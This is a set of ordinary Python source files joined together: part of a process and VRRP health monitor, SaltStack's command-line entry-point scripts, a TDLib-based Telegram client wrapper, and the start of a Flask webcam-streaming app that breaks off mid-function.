state_map = process_map.setdefault(target_name, {})
proc_list = procs.get(target_name, [])
target_count = self._target_procs[target_name].count or 1
state, detail = self._extract_process_state(target_name, target_count, proc_list)
state_map['detail'] = detail
if state:
state_map['state'] = State.healthy
self._metrics.update_var('process_state', 1, labels=[target_name])
state_map.update(state)
self._last_error.pop(target_name, None)
else:
state_map['state'] = State.broken
self._metrics.update_var('process_state', 0, labels=[target_name])
if detail != self._last_error.get(target_name):
self._logger.error(detail)
self._last_error[target_name] = detail
broken.append(target_name)
old_process_map = self._process_state.get('processes', {}).get(target_name, {})
old_state = old_process_map.get('state', State.unknown)
if state_map['state'] != old_state:
self._logger.info(
'State of process %s changed from %s to %s',
target_name, State.State.Name(old_state), State.State.Name(state_map['state']))
self._process_state['processes'] = process_map
self._process_state['process_state_last_update'] = self._current_time
old_state = self._process_state.get('process_state')
state = State.broken if broken else State.healthy
old_state_detail = self._process_state.get('process_state_detail')
state_detail = 'Processes in broken state: ' + ', '.join(broken) if broken else ''
if state != old_state or state_detail != old_state_detail:
state_change_count = self._process_state.get('process_state_change_count', 0) + 1
self._logger.info(
'process_state #%d is %s: %s', state_change_count, State.State.Name(state),
state_detail)
self._process_state['process_state'] = state
self._process_state['process_state_detail'] = state_detail
self._process_state['process_state_change_count'] = state_change_count
self._process_state['process_state_last_change'] = self._current_time
def _get_target_processes(self):
"""Get target processes"""
procs = {}
for proc in psutil.process_iter(attrs=_PROC_ATTRS):
cmd_line_str = ' '.join(proc.info['cmdline'])
for target_process_name, target_process_cfg in self._target_procs.items():
proc_list = procs.setdefault(target_process_name, [])
if re.search(target_process_cfg.regex, cmd_line_str):
proc_list.append(proc)
return procs
def _extract_process_state(self, proc_name, proc_count, proc_list):
"""Fill process state for a single process"""
if len(proc_list) != proc_count:
return None, f"Process {proc_name}: number of process ({len(proc_list)}) " \
f"does not match target count ({proc_count})"
old_proc_map = self._process_state.get('processes', {}).get(proc_name, {})
proc_map = {}
cmd_line = ' '.join(proc_list[0].info['cmdline']) if len(proc_list) == 1 else 'multiple'
proc_map['cmd_line'] = cmd_line
create_time_max = max(proc.create_time() for proc in proc_list)
create_time = datetime.fromtimestamp(create_time_max).isoformat()
proc_map['create_time'] = create_time
proc_map['create_time_last_update'] = self._current_time
if create_time != old_proc_map.get('create_time'):
change_count = old_proc_map.get('create_time_change_count', 0) + 1
self._logger.info('create_time #%d for %s: %s', change_count, proc_name, create_time)
proc_map['create_time_change_count'] = change_count
proc_map['create_time_last_change'] = self._current_time
try:
self._aggregate_process_stats(proc_map, proc_list)
except Exception as e:
return None, f'Error in extracting info for process {proc_name}: {e}'
cpu_percent_threshold = self._target_procs[proc_name].cpu_percent_threshold
if cpu_percent_threshold and proc_map['cpu_percent'] > cpu_percent_threshold:
self._logger.warning(
'CPU percent of process %s is %.2f, exceeding threshold %.2f',
proc_name, proc_map['cpu_percent'], cpu_percent_threshold)
return proc_map, f'CPU usage is higher than threshold {cpu_percent_threshold}'
return proc_map, None
def _aggregate_process_stats(self, proc_map, proc_list):
cpu_time_user = 0.0
cpu_time_system = 0.0
cpu_time_iowait = None
cpu_percent = 0.0
memory_rss = 0.0
memory_vms = 0.0
for proc in proc_list:
cpu_time_user += proc.info['cpu_times'].user
cpu_time_system += proc.info['cpu_times'].system
if hasattr(proc.info['cpu_times'], 'iowait'):
if not cpu_time_iowait:
cpu_time_iowait = 0.0
cpu_time_iowait += proc.cpu_times().iowait
cpu_percent += proc.info['cpu_percent']
memory_rss += proc.info['memory_info'].rss / 1e6
memory_vms += proc.info['memory_info'].vms / 1e6
proc_map['cpu_times_s'] = {}
proc_map['cpu_times_s']['user'] = cpu_time_user / len(proc_list)
proc_map['cpu_times_s']['system'] = cpu_time_system / len(proc_list)
if cpu_time_iowait:
proc_map['cpu_times_s']['iowait'] = cpu_time_iowait / len(proc_list)
proc_map['cpu_percent'] = cpu_percent / len(proc_list)
proc_map['memory_info_mb'] = {}
proc_map['memory_info_mb']['rss'] = memory_rss / len(proc_list)
proc_map['memory_info_mb']['vms'] = memory_vms / len(proc_list)
def _check_connections(self):
connections = self._fetch_connections()
connection_info = self._process_state['connections']
connection_info['local_ports'] = {
str(port): self._extract_conn(connections, port) for port in self._connections
}
conn_list = []
for port_info in connection_info['local_ports'].values():
for foreign_address in port_info['foreign_addresses']:
conn_list.append(foreign_address)
conn_list.sort()
conn_state = str(conn_list)
if conn_state != self._conn_state:
self._conn_state = conn_state
self._conn_state_count += 1
self._logger.info('conn_state #%d: %s', self._conn_state_count, conn_state)
connection_info['detail'] = conn_state
connection_info['change_count'] = self._conn_state_count
connection_info['last_change'] = self._current_time
connection_info['last_update'] = self._current_time
def _fetch_connections(self):
connections = {}
with os.popen('netstat -npa 2>/dev/null') as lines:
for line in lines:
if 'ESTABLISHED' in line:
try:
parts = line.split()
local_address = parts[3]
local_parts = local_address.split(':')
local_port = int(local_parts[-1])
foreign_address = parts[4]
connections[foreign_address] = {
'local_port': local_port,
'process_info': parts[6]
}
except Exception as e:
self._logger.error('Processing netstat entry: %s', e)
return connections
def _extract_conn(self, connections, port):
foreign_addresses = {}
process_entry = None
for foreign_address in connections:
entry = connections[foreign_address]
if entry['local_port'] == port:
new_process_entry = entry['process_info']
if process_entry and new_process_entry != process_entry:
self._logger.error(
'Inconsistent process entry for %s: %s != %s', port, process_entry,
new_process_entry)
process_entry = new_process_entry
foreign_addresses[foreign_address] = {
'established': 'now'
}
return {
'process_entry': process_entry,
'foreign_addresses': foreign_addresses
}
def _check_vrrp_info(self):
"""Get vrrp info"""
vrrp_state = None
error_detail = None
try:
if not self._check_vrrp:
return
with open(self._keepalived_pid_file) as pid_file:
pid = int(pid_file.readline())
os.kill(pid, signal.SIGUSR1)
time.sleep(1)
with open('/tmp/keepalived.data') as stats_file:
for line in stats_file:
match = re.search('State = (MASTER|BACKUP|FAULT)', line)
if not match:
continue
vrrp_state = match.group(1)
break
if not vrrp_state:
vrrp_state = VRRP_ERROR
error_detail = 'Could not find matching states'
except Exception as e:
vrrp_state = VRRP_ERROR
error_detail = f'Cannot get VRRP info: {e}'
finally:
self._vrrp_state.update(self._handle_vrrp_state(vrrp_state, error_detail))
def _handle_vrrp_state(self, vrrp_state, error_detail=None):
"""Extract vrrp state from keepalived stats data"""
vrrp_map = {'vrrp_state': vrrp_state}
old_vrrp_map = copy.deepcopy(self._vrrp_state)
old_vrrp_state = old_vrrp_map.get('vrrp_state')
old_vrrp_state_detail = old_vrrp_map.get('vrrp_state_detail')
if vrrp_state != old_vrrp_state or error_detail != old_vrrp_state_detail:
vrrp_map['vrrp_state_last_change'] = self._current_time
state_change_count = old_vrrp_map.get('vrrp_state_change_count', 0) + 1
vrrp_map['vrrp_state_change_count'] = state_change_count
self._logger.info(
'VRRP state #%d: %s, %s', vrrp_map['vrrp_state_change_count'], vrrp_state,
error_detail)
if vrrp_state == VRRP_MASTER:
vrrp_map['vrrp_state_detail'] = None
self._active_state_handler(State.active)
elif vrrp_state == VRRP_BACKUP:
vrrp_map['vrrp_state_detail'] = None
self._active_state_handler(State.inactive)
elif vrrp_state == VRRP_FAULT:
vrrp_map['vrrp_state_detail'] = 'VRRP is in fault state'
self._active_state_handler(State.broken)
elif vrrp_state == VRRP_ERROR:
vrrp_map['vrrp_state_detail'] = error_detail
self._active_state_handler(State.broken)
else:
self._logger.error('Unknown VRRP state: %s', vrrp_state)
if vrrp_state != VRRP_MASTER:
self._cleanup_handler()
return vrrp_map
def _periodic_check_local_state(self):
"""Periodically gather local state"""
with self._lock:
self._current_time = datetime.now().isoformat()
self._check_process_info()
self._check_vrrp_info()
self._check_connections()
threading.Timer(self._process_interval, self._periodic_check_local_state).start()
def start_process_loop(self):
"""Start a loop to periodically gather local state"""
threading.Thread(target=self._periodic_check_local_state, daemon=True).start()
|
scripts.py | # -*- coding: utf-8 -*-
'''
This module contains the function calls to execute command line scripts
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import sys
import time
import logging
import threading
import traceback
from random import randint
# Import salt libs
from salt.exceptions import SaltSystemExit, SaltClientError, SaltReqTimeoutError
import salt.defaults.exitcodes # pylint: disable=unused-import
log = logging.getLogger(__name__)
def _handle_interrupt(exc, original_exc, hardfail=False, trace=''):
'''
if hardfailing:
If we got the original stacktrace, log it
If all cases, raise the original exception
but this is logically part the initial
stack.
else just let salt exit gracefully
'''
if hardfail:
if trace:
log.error(trace)
raise original_exc
else:
raise exc
def salt_master():
'''
Start the salt master.
'''
import salt.cli.daemons
master = salt.cli.daemons.Master()
master.start()
def minion_process(queue):
'''
Start a minion process
'''
import salt.cli.daemons
# salt_minion spawns this function in a new process
def suicide_when_without_parent(parent_pid):
'''
Have the minion suicide if the parent process is gone
NOTE: there is a small race issue where the parent PID could be replace
with another process with the same PID!
'''
while True:
time.sleep(5)
try:
# check pid alive (Unix only trick!)
os.kill(parent_pid, 0)
except OSError:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
os._exit(999)
if not salt.utils.is_windows():
thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
thread.start()
restart = False
minion = None
try:
minion = salt.cli.daemons.Minion()
minion.start()
except (Exception, SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
log.error('Minion failed to start', exc_info=False)
restart = True
except SystemExit as exc:
restart = False
if restart is True:
log.warn('** Restarting minion **')
delay = 60
if minion is not None:
if hasattr(minion, 'config'):
delay = minion.config.get('random_reauth_delay', 60)
random_delay = randint(1, delay)
log.info('Sleeping random_reauth_delay of {0} seconds'.format(random_delay))
# preform delay after minion resources have been cleaned
if minion.options.daemon:
time.sleep(random_delay)
salt_minion()
else:
queue.put(random_delay)
else:
queue.put(0)
def salt_minion():
'''
Start the salt minion.
'''
import salt.cli.daemons
import multiprocessing
if '' in sys.path:
sys.path.remove('')
if salt.utils.is_windows():
minion = salt.cli.daemons.Minion()
minion.start()
return
if '--disable-keepalive' in sys.argv:
sys.argv.remove('--disable-keepalive')
minion = salt.cli.daemons.Minion()
minion.start()
return
# keep one minion subprocess running
while True:
try:
queue = multiprocessing.Queue()
except Exception:
# This breaks in containers
minion = salt.cli.daemons.Minion()
minion.start()
return
process = multiprocessing.Process(target=minion_process, args=(queue,))
process.start()
try:
process.join()
try:
restart_delay = queue.get(block=False)
except Exception:
if process.exitcode == 0:
# Minion process ended naturally, Ctrl+C or --version
break
restart_delay = 60
if restart_delay == 0:
# Minion process ended naturally, Ctrl+C, --version, etc.
break
# delay restart to reduce flooding and allow network resources to close
time.sleep(restart_delay)
except KeyboardInterrupt:
break
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def proxy_minion_process(queue):
'''
Start a proxy minion process
'''
import salt.cli.daemons
# salt_minion spawns this function in a new process
def suicide_when_without_parent(parent_pid):
'''
Have the minion suicide if the parent process is gone
NOTE: there is a small race issue where the parent PID could be replace
with another process with the same PID!
'''
while True:
time.sleep(5)
try:
# check pid alive (Unix only trick!)
os.kill(parent_pid, 0)
except OSError:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
os._exit(999)
if not salt.utils.is_windows():
thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
thread.start()
restart = False
proxyminion = None
try:
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
except (Exception, SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
log.error('Proxy Minion failed to start: ', exc_info=True)
restart = True
except SystemExit as exc:
restart = False
if restart is True:
log.warn('** Restarting proxy minion **')
delay = 60
if proxyminion is not None:
if hasattr(proxyminion, 'config'):
delay = proxyminion.config.get('random_reauth_delay', 60)
random_delay = randint(1, delay)
log.info('Sleeping random_reauth_delay of {0} seconds'.format(random_delay))
# preform delay after minion resources have been cleaned
queue.put(random_delay)
else:
queue.put(0)
def salt_proxy_minion():
'''
Start a proxy minion.
'''
import salt.cli.daemons
import multiprocessing
if '' in sys.path:
sys.path.remove('')
if salt.utils.is_windows():
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
if '--disable-keepalive' in sys.argv:
sys.argv.remove('--disable-keepalive')
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
# keep one minion subprocess running
while True:
try:
queue = multiprocessing.Queue()
except Exception:
# This breaks in containers
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
process = multiprocessing.Process(target=proxy_minion_process, args=(queue,))
process.start()
try:
process.join()
try:
restart_delay = queue.get(block=False)
except Exception:
if process.exitcode == 0:
# Minion process ended naturally, Ctrl+C or --version
break
restart_delay = 60
if restart_delay == 0:
# Minion process ended naturally, Ctrl+C, --version, etc.
break
# delay restart to reduce flooding and allow network resources to close
time.sleep(restart_delay)
except KeyboardInterrupt:
break
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def salt_syndic():
'''
Start the salt syndic.
'''
import salt.cli.daemons
pid = os.getpid()
try:
syndic = salt.cli.daemons.Syndic()
syndic.start()
except KeyboardInterrupt:
os.kill(pid, 15)
def salt_key():
'''
Manage the authentication keys with salt-key.
'''
import salt.cli.key
client = None
try:
client = salt.cli.key.SaltKey()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
def salt_cp():
'''
Publish commands to the salt system from the command line on the
master.
'''
import salt.cli.cp
client = None
try:
client = salt.cli.cp.SaltCPCli()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
def salt_call():
'''
Directly call a salt command in the modules, does not require a running
salt minion to run.
'''
import salt.cli.call
if '' in sys.path:
sys.path.remove('')
client = None
try:
client = salt.cli.call.SaltCall()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
def salt_run():
'''
Execute a salt convenience routine.
'''
import salt.cli.run
if '' in sys.path:
sys.path.remove('')
client = None
try:
client = salt.cli.run.SaltRun()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
def salt_ssh():
'''
Execute the salt-ssh system
'''
import salt.cli.ssh
if '' in sys.path:
sys.path.remove('')
client = None
try:
client = salt.cli.ssh.SaltSSH()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
except SaltClientError as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit(err),
err,
hardcrash, trace=trace)
def salt_cloud():
'''
The main function for salt-cloud
'''
try:
import salt.cloud.cli
has_saltcloud = True
except ImportError as e:
log.error("Error importing salt cloud {0}".format(e))
# No salt cloud on Windows
has_saltcloud = False
if '' in sys.path:
sys.path.remove('')
if not has_saltcloud:
print('salt-cloud is not available in this system')
sys.exit(salt.defaults.exitcodes.EX_UNAVAILABLE)
client = None
try:
client = salt.cloud.cli.SaltCloud()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
def salt_api():
'''
The main function for salt-api
'''
import salt.cli.api
sapi = salt.cli.api.SaltAPI() # pylint: disable=E1120
sapi.run()
def salt_main():
'''
Publish commands to the salt system from the command line on the
master.
'''
import salt.cli.salt
if '' in sys.path:
sys.path.remove('')
client = None
try:
client = salt.cli.salt.SaltCMD()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
def salt_spm():
'''
The main function for spm, the Salt Package Manager
.. versionadded:: 2015.8.0
'''
import salt.cli.spm
spm = salt.cli.spm.SPM() # pylint: disable=E1120
spm.run()
|
client.py | import os
import hashlib
import time
import queue
import signal
import typing
import getpass
import logging
import base64
import threading
from typing import Any, Dict, List, Type, Callable, Optional, DefaultDict, Tuple, Union
from types import FrameType
from collections import defaultdict
from telegram import VERSION
from telegram.utils import AsyncResult
from telegram.tdjson import TDJson
from telegram.worker import BaseWorker, SimpleWorker
logger = logging.getLogger(__name__)
MESSAGE_HANDLER_TYPE: str = 'updateNewMessage'
class Telegram:
def __init__(
self,
api_id: int,
api_hash: str,
database_encryption_key: Union[str, bytes],
phone: Optional[str] = None,
bot_token: Optional[str] = None,
library_path: Optional[str] = None,
worker: Optional[Type[BaseWorker]] = None,
files_directory: Optional[str] = None,
use_test_dc: bool = False,
use_message_database: bool = True,
device_model: str = 'python-telegram',
application_version: str = VERSION,
system_version: str = 'unknown',
system_language_code: str = 'en',
login: bool = False,
default_workers_queue_size: int = 1000,
tdlib_verbosity: int = 2,
proxy_server: str = '',
proxy_port: int = 0,
proxy_type: Optional[Dict[str, str]] = None,
use_secret_chats: bool = True,
) -> None:
"""
Args:
api_id - ID of your app (https://my.telegram.org/apps/)
api_hash - api_hash of your app (https://my.telegram.org/apps/)
phone - your phone number
library_path - you can change path to the compiled libtdjson library
worker - worker to process updates
files_directory - directory for the tdlib's files (database, images, etc.)
use_test_dc - use test datacenter
use_message_database
use_secret_chats
device_model
application_version
system_version
system_language_code
"""
self.api_id = api_id
self.api_hash = api_hash
self.library_path = library_path
self.phone = phone
self.bot_token = bot_token
self.use_test_dc = use_test_dc
self.device_model = device_model
self.system_version = system_version
self.system_language_code = system_language_code
self.application_version = application_version
self.use_message_database = use_message_database
self._queue_put_timeout = 10
self.proxy_server = proxy_server
self.proxy_port = proxy_port
self.proxy_type = proxy_type
self.use_secret_chats = use_secret_chats
if not self.bot_token and not self.phone:
raise ValueError('You must provide bot_token or phone')
self._database_encryption_key = database_encryption_key
if not files_directory:
hasher = hashlib.md5()
str_to_encode: str = self.phone or self.bot_token # type: ignore
hasher.update(str_to_encode.encode('utf-8'))
directory_name = hasher.hexdigest()
files_directory = f'/tmp/.tdlib_files/{directory_name}/'
self.files_directory = files_directory
self._authorized = False
self._is_enabled = False
# todo: move to worker
self._workers_queue: queue.Queue = queue.Queue(
maxsize=default_workers_queue_size
)
if not worker:
worker = SimpleWorker
self.worker = worker(queue=self._workers_queue)
self._results: Dict[str, AsyncResult] = {}
self._update_handlers: DefaultDict[str, List[Callable]] = defaultdict(list)
self._tdjson = TDJson(library_path=library_path, verbosity=tdlib_verbosity)
self._run()
if login:
self.login()
def __del__(self) -> None:
self.stop()
def stop(self) -> None:
"""Stops the client"""
self._is_enabled = False
if hasattr(self, '_tdjson'):
self._tdjson.stop()
def send_message(self, chat_id: int, text: str) -> AsyncResult:
"""
Sends a message to a chat. The chat must be in the tdlib's database.
If there is no chat in the DB, tdlib returns an error.
Chat is being saved to the database when the client receives a message or when you call the `get_chats` method.
Args:
chat_id
text
Returns:
AsyncResult
The update will be:
{
'@type': 'message',
'id': 1,
'sender_user_id': 2,
'chat_id': 3,
...
}
"""
data = {
'@type': 'sendMessage',
'chat_id': chat_id,
'input_message_content': {
'@type': 'inputMessageText',
'text': {'@type': 'formattedText', 'text': text},
},
}
return self._send_data(data)
def get_chat(self, chat_id: int) -> AsyncResult:
"""
This is offline request, if there is no chat in your database it will not be found
tdlib saves chat to the database when it receives a new message or when you call `get_chats` method.
"""
data = {'@type': 'getChat', 'chat_id': chat_id}
return self._send_data(data)
def get_me(self) -> AsyncResult:
"""
Requests information of the current user (getMe method)
https://core.telegram.org/tdlib/docs/classtd_1_1td__api_1_1get_me.html
"""
return self.call_method('getMe')
def get_user(self, user_id: int) -> AsyncResult:
"""
Requests information about a user with id = user_id.
https://core.telegram.org/tdlib/docs/classtd_1_1td__api_1_1get_user.html
"""
return self.call_method('getUser', params={'user_id': user_id})
def get_chats(
self, offset_order: int = 0, offset_chat_id: int = 0, limit: int = 100
) -> AsyncResult:
"""
Returns a list of chats:
Returns:
{
'@type': 'chats',
'chat_ids': [...],
'@extra': {
'request_id': '...'
}
}
"""
data = {
'@type': 'getChats',
'offset_order': offset_order,
'offset_chat_id': offset_chat_id,
'limit': limit,
}
return self._send_data(data)
def get_chat_history(
self,
chat_id: int,
limit: int = 1000,
from_message_id: int = 0,
offset: int = 0,
only_local: bool = False,
) -> AsyncResult:
"""
Returns history of a chat
Args:
chat_id
limit
from_message_id
offset
only_local
"""
data = {
'@type': 'getChatHistory',
'chat_id': chat_id,
'limit': limit,
'from_message_id': from_message_id,
'offset': offset,
'only_local': only_local,
}
return self._send_data(data)
def get_message(self, chat_id: int, message_id: int,) -> AsyncResult:
"""
Return a message via its message_id
Args:
chat_id
message_id
Returns:
AsyncResult
The update will be:
{
'@type': 'message',
'id': 1,
'sender_user_id': 2,
'chat_id': 3,
'content': {...},
...
}
"""
data = {
'@type': 'getMessage',
'chat_id': chat_id,
'message_id': message_id,
}
return self._send_data(data)
def delete_messages(
self, chat_id: int, message_ids: List[int], revoke: bool = True
) -> AsyncResult:
"""
Delete a list of messages in a chat
Args:
chat_id
message_ids
revoke
"""
return self._send_data(
{
'@type': 'deleteMessages',
'chat_id': chat_id,
'message_ids': message_ids,
'revoke': revoke,
}
)
def get_supergroup_full_info(self, supergroup_id: int) -> AsyncResult:
"""
Get the full info of a supergroup
Args:
supergroup_id
"""
return self._send_data(
{'@type': 'getSupergroupFullInfo', 'supergroup_id': supergroup_id}
)
def create_basic_group_chat(self, basic_group_id: int) -> AsyncResult:
"""
Create a chat from a basic group
Args:
basic_group_id
"""
return self._send_data(
{'@type': 'createBasicGroupChat', 'basic_group_id': basic_group_id}
)
def get_web_page_instant_view(
self, url: str, force_full: bool = False
) -> AsyncResult:
"""
Use this method to request instant preview of a webpage.
Returns error with 404 if there is no preview for this webpage.
Args:
url: URL of a webpage
force_full: If true, the full instant view for the web page will be returned
"""
data = {'@type': 'getWebPageInstantView', 'url': url, 'force_full': force_full}
return self._send_data(data)
def call_method(
self,
method_name: str,
params: Optional[Dict[str, Any]] = None,
block: bool = False,
) -> AsyncResult:
"""
Use this method to call any other method of the tdlib
Args:
method_name: Name of the method
params: parameters
"""
data = {'@type': method_name}
if params:
data.update(params)
return self._send_data(data, block=block)
def _run(self) -> None:
self._is_enabled = True
self._td_listener = threading.Thread(target=self._listen_to_td)
self._td_listener.daemon = True
self._td_listener.start()
self.worker.run()
def _listen_to_td(self) -> None:
logger.info('[Telegram.td_listener] started')
while self._is_enabled:
update = self._tdjson.receive()
if update:
self._update_async_result(update)
self._run_handlers(update)
def _update_async_result(
self, update: Dict[Any, Any]
) -> typing.Optional[AsyncResult]:
async_result = None
_special_types = (
'updateAuthorizationState',
) # for authorizationProcess @extra.request_id doesn't work
if update.get('@type') in _special_types:
request_id = update['@type']
else:
request_id = update.get('@extra', {}).get('request_id')
if not request_id:
logger.debug('request_id has not been found in the update')
else:
async_result = self._results.get(request_id)
if not async_result:
logger.debug(
'async_result has not been found in by request_id=%s', request_id
)
else:
done = async_result.parse_update(update)
if done:
self._results.pop(request_id, None)
return async_result
def _run_handlers(self, update: Dict[Any, Any]) -> None:
update_type: str = update.get('@type', 'unknown')
for handler in self._update_handlers[update_type]:
self._workers_queue.put((handler, update), timeout=self._queue_put_timeout)
def remove_update_handler(self, handler_type: str, func: Callable) -> None:
"""
Remove a handler with the specified type
"""
try:
self._update_handlers[handler_type].remove(func)
except (ValueError, KeyError):
# not in the list
pass
def add_message_handler(self, func: Callable) -> None:
self.add_update_handler(MESSAGE_HANDLER_TYPE, func)
def add_update_handler(self, handler_type: str, func: Callable) -> None:
if func not in self._update_handlers[handler_type]:
self._update_handlers[handler_type].append(func)
def _send_data(
self,
data: Dict[Any, Any],
result_id: Optional[str] = None,
block: bool = False,
) -> AsyncResult:
"""
Sends data to tdlib.
If `block`is True, waits for the result
"""
if '@extra' not in data:
data['@extra'] = {}
if not result_id and 'request_id' in data['@extra']:
result_id = data['@extra']['request_id']
async_result = AsyncResult(client=self, result_id=result_id)
data['@extra']['request_id'] = async_result.id
self._results[async_result.id] = async_result
self._tdjson.send(data)
async_result.request = data
if block:
async_result.wait(raise_exc=True)
return async_result
def idle(
self, stop_signals: Tuple = (signal.SIGINT, signal.SIGTERM, signal.SIGABRT)
) -> None:
"""Blocks until one of the signals are received and stops"""
for sig in stop_signals:
signal.signal(sig, self._signal_handler)
self._is_enabled = True
while self._is_enabled:
time.sleep(0.1)
def _signal_handler(self, signum: int, frame: FrameType) -> None:
self._is_enabled = False
def get_authorization_state(self) -> AsyncResult:
logger.debug('Getting authorization state')
data = {'@type': 'getAuthorizationState'}
return self._send_data(data, result_id='getAuthorizationState')
def login(self) -> None:
"""
Login process (blocking)
Must be called before any other call.
It sends initial params to the tdlib, sets database encryption key, etc.
"""
if self.proxy_server:
self._send_add_proxy()
authorization_state = None
actions = {
None: self.get_authorization_state,
'authorizationStateWaitTdlibParameters': self._set_initial_params,
'authorizationStateWaitEncryptionKey': self._send_encryption_key,
'authorizationStateWaitPhoneNumber': self._send_phone_number_or_bot_token,
'authorizationStateWaitCode': self._send_telegram_code,
'authorizationStateWaitPassword': self._send_password,
'authorizationStateReady': self._complete_authorization,
}
if self.phone:
logger.info('[login] Login process has been started with phone')
else:
logger.info('[login] Login process has been started with bot token')
while not self._authorized:
logger.info('[login] current authorization state: %s', authorization_state)
result = actions[authorization_state]()
if result:
result.wait(raise_exc=True)
if result.update is None:
raise RuntimeError('Something wrong, the result update is None')
if result.id == 'getAuthorizationState':
authorization_state = result.update['@type']
else:
authorization_state = result.update['authorization_state']['@type']
def _set_initial_params(self) -> AsyncResult:
logger.info(
'Setting tdlib initial params: files_dir=%s, test_dc=%s',
self.files_directory,
self.use_test_dc,
)
data = {
# todo: params
'@type': 'setTdlibParameters',
'parameters': {
'use_test_dc': self.use_test_dc,
'api_id': self.api_id,
'api_hash': self.api_hash,
'device_model': self.device_model,
'system_version': self.system_version,
'application_version': self.application_version,
'system_language_code': self.system_language_code,
'database_directory': os.path.join(self.files_directory, 'database'),
'use_message_database': self.use_message_database,
'files_directory': os.path.join(self.files_directory, 'files'),
'use_secret_chats': self.use_secret_chats,
},
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_encryption_key(self) -> AsyncResult:
logger.info('Sending encryption key')
key = self._database_encryption_key
if isinstance(key, str):
key = key.encode()
data = {
'@type': 'checkDatabaseEncryptionKey',
'encryption_key': base64.b64encode(key).decode(),
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_phone_number_or_bot_token(self) -> AsyncResult:
"""Sends phone number or a bot_token"""
if self.phone:
return self._send_phone_number()
elif self.bot_token:
return self._send_bot_token()
else:
raise RuntimeError('Unknown mode: both bot_token and phone are None')
def _send_phone_number(self) -> AsyncResult:
logger.info('Sending phone number')
data = {
'@type': 'setAuthenticationPhoneNumber',
'phone_number': self.phone,
'allow_flash_call': False,
'is_current_phone_number': True,
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_add_proxy(self) -> AsyncResult:
logger.info('Sending addProxy')
data = {
'@type': 'addProxy',
'server': self.proxy_server,
'port': self.proxy_port,
'enable': True,
'type': self.proxy_type,
}
return self._send_data(data, result_id='setProxy')
def _send_bot_token(self) -> AsyncResult:
logger.info('Sending bot token')
data = {'@type': 'checkAuthenticationBotToken', 'token': self.bot_token}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_telegram_code(self) -> AsyncResult:
logger.info('Sending code')
code = input('Enter code:')
data = {'@type': 'checkAuthenticationCode', 'code': str(code)}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_password(self) -> AsyncResult:
logger.info('Sending password')
password = getpass.getpass('Password:')
data = {'@type': 'checkAuthenticationPassword', 'password': password}
return self._send_data(data, result_id='updateAuthorizationState')
def _complete_authorization(self) -> None:
logger.info('Completing auth process')
self._authorized = True
|
webcam.py | import time
import queue
import select
import threading
import contextlib
import flask
import v4l2capture
app = flask.Flask('basic-web-cam')
clients = set()
def gen_frames():
cam = v4l2capture.Video_device("/dev/video0")
with contextlib.closing(cam):
cam.set_format(640, 480, fourcc='MJPG')
cam.create_buffers(1)
cam.queue_all_buffers()
cam.start()
while True:
select.select((cam,), (), ())
yield cam.read_and_queue()
def engine(stop):
while not stop:
while not clients:
if stop:
return
print ("waiting for clients...")
time.sleep(1)
for frame in gen_frames():
if not clients:
break
if stop:
return
broadcast(clients, frame)
def broadcast(clients, frame):
frame = b"--frame\r\nContent-Type: image/jpeg\r\n\r\n" + frame + b"\r\n"
for client in clients:
if client.empty():
client.put(frame)
def gen_stream():
client = queue.Queue()
clients.add(client)
try:
for frame in iter(client.get, None):
yield frame
finally:
clients.remove(client)
@app.route("/")
def index():
return '<!DOCTYPE html><html><body><img src="/stream" /></body></html>'
@app.route("/stream")
def stream():
return flask.Response(
